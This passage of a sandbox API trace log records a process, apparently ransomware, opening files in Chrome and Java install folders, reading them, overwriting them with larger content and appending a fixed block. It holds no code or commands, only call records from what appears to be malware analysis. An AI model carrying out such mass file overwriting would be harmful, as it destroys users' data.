lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0124.193] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0124.193] WriteFile (in: hFile=0x204, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.193] WriteFile (in: hFile=0x204, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0124.193] CloseHandle (hObject=0x204) returned 1 [0124.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\nacl_irt_x86_64.nexe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0124.197] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0124.197] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x380630 [0124.197] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0124.197] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0124.198] ReleaseMutex (hMutex=0x168) returned 1 [0124.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nacl_irt_x86_64.nexe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nacl_irt_x86_64.nexe", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nacl_irt_x86_64.nexe", lpUsedDefaultChar=0x0) returned 20 [0124.198] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0124.260] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0127.188] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0127.188] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x37e630 [0127.188] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0127.279] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x37e630 [0127.280] WriteFile (in: hFile=0x204, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0127.281] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0127.281] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0127.281] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0127.282] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0127.282] CloseHandle (hObject=0x204) returned 1 [0127.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.284] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.284] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3b6 [0127.284] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.284] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.285] ReleaseMutex (hMutex=0x168) returned 1 [0127.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0127.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0127.285] ReadFile (in: hFile=0x204, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3b6, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x359f2bc*=0x3b6, lpOverlapped=0x0) returned 1 [0127.293] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0127.294] WriteFile (in: hFile=0x204, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x93e, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x359f2d0*=0x93e, lpOverlapped=0x0) returned 1 [0127.294] CloseHandle (hObject=0x204) returned 1 [0127.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java-rmi.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.376] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.376] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3da8 [0127.376] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.376] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.376] ReleaseMutex (hMutex=0x168) returned 1 [0127.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java-rmi.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0127.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java-rmi.exe", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java-rmi.exe", lpUsedDefaultChar=0x0) returned 12 [0127.376] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.379] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2da8 [0127.379] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.380] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2da8 [0127.380] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.381] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0127.381] WriteFile (in: hFile=0x204, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0127.382] CloseHandle (hObject=0x204) returned 1 [0127.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kinit.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3da8 [0127.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.383] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.383] ReleaseMutex (hMutex=0x168) returned 1 [0127.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kinit.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0127.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kinit.exe", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kinit.exe", lpUsedDefaultChar=0x0) returned 9 [0127.383] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2da8 [0127.385] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.386] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2da8 [0127.386] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.395] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0127.395] WriteFile (in: hFile=0x204, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0127.395] CloseHandle (hObject=0x204) returned 1 [0127.396] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\servertool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.397] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.397] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3da8 [0127.397] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0127.397] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.397] ReleaseMutex (hMutex=0x168) returned 1 [0127.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="servertool.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0127.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="servertool.exe", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="servertool.exe", lpUsedDefaultChar=0x0) returned 14 [0127.397] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.435] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2da8 [0127.435] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.485] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2da8 [0127.485] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.486] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0127.486] WriteFile (in: hFile=0x204, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0127.486] CloseHandle (hObject=0x204) returned 1 [0127.486] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.324] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.325] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x364427 [0128.325] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.325] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.325] ReleaseMutex (hMutex=0x168) returned 1 [0128.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="charsets.jar", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="charsets.jar", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="charsets.jar", lpUsedDefaultChar=0x0) returned 12 [0128.325] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.328] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.330] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0128.330] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x362427 [0128.330] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0128.332] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x362427 [0128.333] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0128.333] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0128.333] WriteFile (in: hFile=0x1f0, lpBuffer=0x28fa808*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28fa808*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.334] WriteFile (in: hFile=0x1f0, lpBuffer=0x28fa808*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28fa808*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.334] WriteFile (in: hFile=0x1f0, lpBuffer=0x28fa808*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28fa808*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0128.334] CloseHandle (hObject=0x1f0) returned 1 [0128.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.335] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.336] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1068 [0128.336] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.336] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.336] ReleaseMutex (hMutex=0x168) returned 1 [0128.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="currency.data", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="currency.data", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="currency.data", lpUsedDefaultChar=0x0) returned 13 [0128.336] ReadFile (in: hFile=0x1f0, lpBuffer=0x2866f58, nNumberOfBytesToRead=0x1068, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesRead=0x359f2bc*=0x1068, lpOverlapped=0x0) returned 1 [0128.338] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0128.338] WriteFile (in: hFile=0x1f0, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x359f2d0*=0x15f0, lpOverlapped=0x0) returned 1 [0128.338] CloseHandle (hObject=0x1f0) returned 1 [0128.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x18cd [0128.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0128.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.340] ReleaseMutex (hMutex=0x168) returned 1 [0128.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ja.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0128.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ja.properties", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_ja.properties", lpUsedDefaultChar=0x0) returned 22 [0128.340] ReadFile (in: hFile=0x1f0, lpBuffer=0x2866f58, nNumberOfBytesToRead=0x18cd, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesRead=0x359f2bc*=0x18cd, lpOverlapped=0x0) returned 1 [0128.342] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) 